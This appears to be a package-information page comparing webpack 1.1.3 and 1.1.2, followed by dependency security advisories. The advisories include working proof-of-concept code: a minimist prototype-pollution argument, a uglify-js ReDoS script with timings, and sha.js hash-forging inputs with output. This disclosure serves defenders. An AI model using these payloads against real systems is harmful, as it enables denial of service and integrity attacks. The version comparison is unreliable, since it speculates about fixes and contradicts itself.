Webpack versions 1.1.3 and 1.1.2 are incremental updates to a module bundler designed for packaging CommonJS/AMD modules for browser deployment. Both versions share identical core functionality, providing the ability to split codebases into manageable bundles loaded on demand. They both support loaders for preprocessing various file types such as JSON, Jade, CoffeeScript, CSS, and Less, alongside custom loaders, streamlining asset management and build processes. The dependency list remains consistent between the two versions, ensuring continued compatibility with essential libraries like async, clone, mkdirp, esprima, tapable, optimist, uglify-js, webpack-core, enhanced-resolve, and node-libs-browser. Similarly, the devDependencies, crucial for development and testing, are also unchanged. These include testing frameworks like mocha and should, along with loaders for various file types and plugins such as i18n-webpack-plugin and component-webpack-plugin, ensuring existing development workflows remain intact.
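To illustrate the loader and code-splitting features described above, here is a minimal, hypothetical webpack 1.x configuration sketch; the entry and output paths and the specific loader packages (json-loader, style-loader, css-loader, less-loader) are assumptions for the example, not taken from this package's own build.

// webpack.config.js (hypothetical webpack 1.x example)
module.exports = {
  entry: './src/app.js',
  output: {
    path: './dist',
    filename: 'bundle.js'
  },
  module: {
    loaders: [
      // Preprocess JSON and Less files before they are bundled.
      { test: /\.json$/, loader: 'json-loader' },
      { test: /\.less$/, loader: 'style-loader!css-loader!less-loader' }
    ]
  }
};

On-demand loading in webpack 1.x is expressed with require.ensure(), which splits the referenced modules into a separate chunk fetched at runtime.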
The key difference lies in the release date: version 1.1.3 was released on April 3, 2014, following version 1.1.2, released on March 31, 2014. This suggests that version 1.1.3 likely incorporates bug fixes, minor improvements, or dependency updates over its predecessor. Given the minor version increment, developers can expect backward compatibility and a smooth transition. Users should upgrade to version 1.1.3 to benefit from the latest stability enhancements and potential performance improvements, ensuring a more reliable and efficient bundling process. The fact that nothing changed apart from the release date is a good sign of the project's maturity: everything works, and only a small fix was needed.
All vulnerabilities related to version 1.1.3 of the package
Prototype Pollution in minimist
Affected versions of minimist are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of Object, causing the addition or modification of an existing property that will exist on all objects.
Parsing the argument --__proto__.y=Polluted adds a y property with the value Polluted to all objects. The argument --__proto__=Polluted raises an uncaught error and crashes the application.
This is exploitable if attackers have control over the arguments being passed to minimist.
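As a minimal sketch of the issue, assuming a vulnerable minimist release (prior to 0.2.1 / 1.2.3) is installed:

// poc.js (hypothetical demonstration, not part of webpack itself)
const parseArgs = require('minimist')

// Simulate attacker-controlled command-line arguments.
const argv = parseArgs(['--__proto__.y=Polluted'])

// On a vulnerable version the property leaks onto Object.prototype and
// shows up on every object; on a patched version this prints undefined.
console.log(({}).y)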
Upgrade to versions 0.2.1, 1.2.3 or later.
Prototype Pollution in minimist
Minimist prior to 1.2.6 and 0.2.4 is vulnerable to prototype pollution via the file index.js, function setKey() (lines 69-95).
Regular Expression Denial of Service in uglify-js
Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.
var u = require('uglify-js');

// Builds a string of len + 1 repetitions of chr.
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// A long run of digits followed by ".1ee7" exercises the vulnerable
// regular expression in parse() (see the timings below).
u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");
$ time node test.js 10000
real 0m1.091s
user 0m1.047s
sys 0m0.039s
$ time node test.js 80000
real 0m6.486s
user 0m6.229s
sys 0m0.094s
Update to version 2.6.0 or later.
sha.js is missing type checks leading to hash rewind and passing on crafted data
This is the same as GHSA-cpq7-6gpm-g9rc but just for sha.js, as it has its own implementation.
Missing input type checks can allow types other than a well-formed Buffer or string, resulting in invalid values, hanging, and rewinding of the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.
See PoC
// Crafts a message list that hashes to the same digest as data: the
// { length: -payload.length } object rewinds the internal length counter,
// so the bytes that follow overwrite the payload in the block buffer.
const forgeHash = (data, payload) => JSON.stringify([payload, { length: -payload.length }, [...data]])

const sha = require('sha.js')
const { randomBytes } = require('crypto')

const sha256 = (...messages) => {
  const hash = sha('sha256')
  messages.forEach((m) => hash.update(m))
  return hash.digest('hex')
}

const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever
const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')
const receivedMessage = JSON.parse(payload) // e.g. over network, whatever

console.log(sha256(...validMessage))
console.log(sha256(...receivedMessage))
console.log(receivedMessage[0])
Output:
638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
Hashed input means safe
Or just:
> require('sha.js')('sha256').update('foo').digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
> require('sha.js')('sha256').update('fooabc').update({length:-3}).digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
Crafted inputs that exploit the missing type checks include:
- {length: -x} rewinds the hash state by x bytes. This is behind the PoC above; this way an attacker can also turn a tagged hash in cryptographic libraries into an untagged hash.
- { length: buf.length, ...buf, 0: buf[0] + 256 } will result in the same hash as buf, but can be treated by other code differently (e.g. bn.js).
- {length: '1e99'}
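As a sketch of the second item in the list above, assuming a vulnerable sha.js release is installed: the crafted object is not a Buffer, but its length and indexed properties are read anyway, and the value buf[0] + 256 truncates back to buf[0] when written into the hash's internal Uint8Array block, so the digests match.

const sha = require('sha.js')
const { randomBytes } = require('crypto')

const buf = randomBytes(8)
// Same bytes as buf once truncated modulo 256, but a different object shape.
const crafted = { length: buf.length, ...buf, 0: buf[0] + 256 }

console.log(sha('sha256').update(buf).digest('hex'))
console.log(sha('sha256').update(crafted).digest('hex')) // same digest on vulnerable versions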